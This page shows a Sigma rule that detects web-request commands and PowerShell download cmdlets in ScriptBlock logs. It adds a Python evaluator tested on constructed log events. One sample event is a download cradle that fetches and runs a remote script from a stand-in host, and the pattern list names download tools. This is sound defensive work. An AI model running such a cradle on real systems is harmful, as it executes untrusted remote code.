Usage Of Web Request Commands And Cmdlets - ScriptBlock
Detects the use of various web request commands with command-line tools and Windows PowerShell cmdlets (including aliases) via PowerShell ScriptBlock logs
Sigma rule
title: Usage Of Web Request Commands And Cmdlets - ScriptBlock
id: 1139d2e2-84b1-4226-b445-354492eba8ba
related:
    - id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d
      type: derived
status: test
description: Detects the use of various web request commands with command-line tools and Windows PowerShell cmdlets (including aliases) via PowerShell ScriptBlock logs
references:
    - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/
    - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell
author: James Pemberton / @4A616D6573
date: 2019-10-24
modified: 2023-01-10
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains:
            - '[System.Net.WebRequest]::create'
            - 'curl '
            - 'Invoke-RestMethod'
            - 'Invoke-WebRequest'
            - 'iwr '
            - 'Net.WebClient'
            - 'Resume-BitsTransfer'
            - 'Start-BitsTransfer'
            - 'wget '
            - 'WinHttp.WinHttpRequest'
    filter:
        Path|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\'
    condition: selection and not filter
falsepositives:
    - Use of the Get-Command and Get-Help cmdlets to look up Invoke-WebRequest and Start-BitsTransfer.
level: medium
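The following is an added example, not part of the rule above or of the Sigma project: a small Python evaluator that applies the rule's `selection and not filter` logic to a handful of constructed Script Block Logging (event ID 4104) records carrying the two fields the rule reads, `ScriptBlockText` and `Path`. The pattern list and the filter prefix are copied verbatim from the rule; the event texts, script paths and the 192.0.2.0/24 hosts in them are made up for the demonstration. Sigma string matching is case-insensitive unless the `cased` modifier is used, so the evaluator lowercases both sides. Two behaviours are worth seeing: the documented false positive (`Get-Help Invoke-WebRequest`) fires exactly as the rule says, and because `'curl '` and `'wget '` need a space right after the word (they target the Windows PowerShell 5.1 aliases of Invoke-WebRequest, which PowerShell 7 no longer defines), an invocation of `curl.exe` does not match this rule at all.

```python
"""Evaluate this Sigma rule's detection logic over constructed 4104 events.

Added example, not part of the rule or the Sigma project. The event dicts
below are constructed to look like Script Block Logging (event ID 4104)
records with the two fields the rule reads: ScriptBlockText and Path.
"""

# The selection list, copied verbatim from the rule.
WEB_REQUEST_PATTERNS = [
    "[System.Net.WebRequest]::create",
    "curl ",
    "Invoke-RestMethod",
    "Invoke-WebRequest",
    "iwr ",
    "Net.WebClient",
    "Resume-BitsTransfer",
    "Start-BitsTransfer",
    "wget ",
    "WinHttp.WinHttpRequest",
]

# The filter's Path prefix, copied verbatim from the rule.
FILTER_PATH_PREFIX = (
    "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\"
)


def evaluate(event: dict) -> tuple[bool, list[str]]:
    """Apply 'selection and not filter' to one event.

    Sigma compares string values case-insensitively unless the |cased modifier
    is used, so both sides are lowercased. A missing Path (interactively typed
    input has none) means the filter cannot match, so such events are never
    excluded by it.
    """
    text = (event.get("ScriptBlockText") or "").lower()
    matched = [p for p in WEB_REQUEST_PATTERNS if p.lower() in text]
    path = (event.get("Path") or "").lower()
    filtered = path.startswith(FILTER_PATH_PREFIX.lower())
    return bool(matched) and not filtered, matched


# Constructed sample events; hosts are hypothetical addresses from the
# 192.0.2.0/24 documentation range and the script paths are invented.
EVENTS = {
    "cradle": {  # classic download cradle, no script file on disk
        "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.ps1')",
        "Path": None,
    },
    "alias": {  # iwr alias of Invoke-WebRequest
        "ScriptBlockText": "iwr -Uri https://192.0.2.10/a.txt -OutFile a.txt",
        "Path": "C:\\Users\\alice\\run.ps1",
    },
    "help_lookup": {  # the rule's documented false positive
        "ScriptBlockText": "Get-Help Invoke-WebRequest -Full",
        "Path": None,
    },
    "guest_config": {  # selection matches, but the filter excludes the path
        "ScriptBlockText": "Invoke-WebRequest -Uri https://192.0.2.20/policy -OutFile p.json",
        "Path": "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\1.0\\bin\\x.ps1",
    },
    "curl_exe": {  # 'curl ' needs a space right after the word; curl.exe slips past
        "ScriptBlockText": "curl.exe -o a.txt https://192.0.2.10/a.txt",
        "Path": None,
    },
    "benign": {
        "ScriptBlockText": "Get-ChildItem C:\\Temp | Sort-Object Length",
        "Path": None,
    },
}


def alerts(events: dict = EVENTS) -> list[str]:
    """Names of the events that trigger the rule, in input order."""
    return [name for name, ev in events.items() if evaluate(ev)[0]]


if __name__ == "__main__":
    for name, ev in EVENTS.items():
        hit, matched = evaluate(ev)
        print(f"{name:13} alert={hit!s:5} matched={matched}")
```

Running the script lists `cradle`, `alias` and `help_lookup` as alerts; `guest_config` is suppressed by the filter and `curl_exe` never enters the selection. If `curl.exe` invocations matter in your environment, cover them with a process-creation rule rather than by loosening this one, since dropping the trailing space from `'curl '` would also match unrelated words and module names.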
Related rules
- AWS EC2 Startup Shell Script Change
- Alternate PowerShell Hosts - PowerShell Module
- Bad Opsec Powershell Code Artifacts
- BloodHound Collection Files
- Certificate Exported Via PowerShell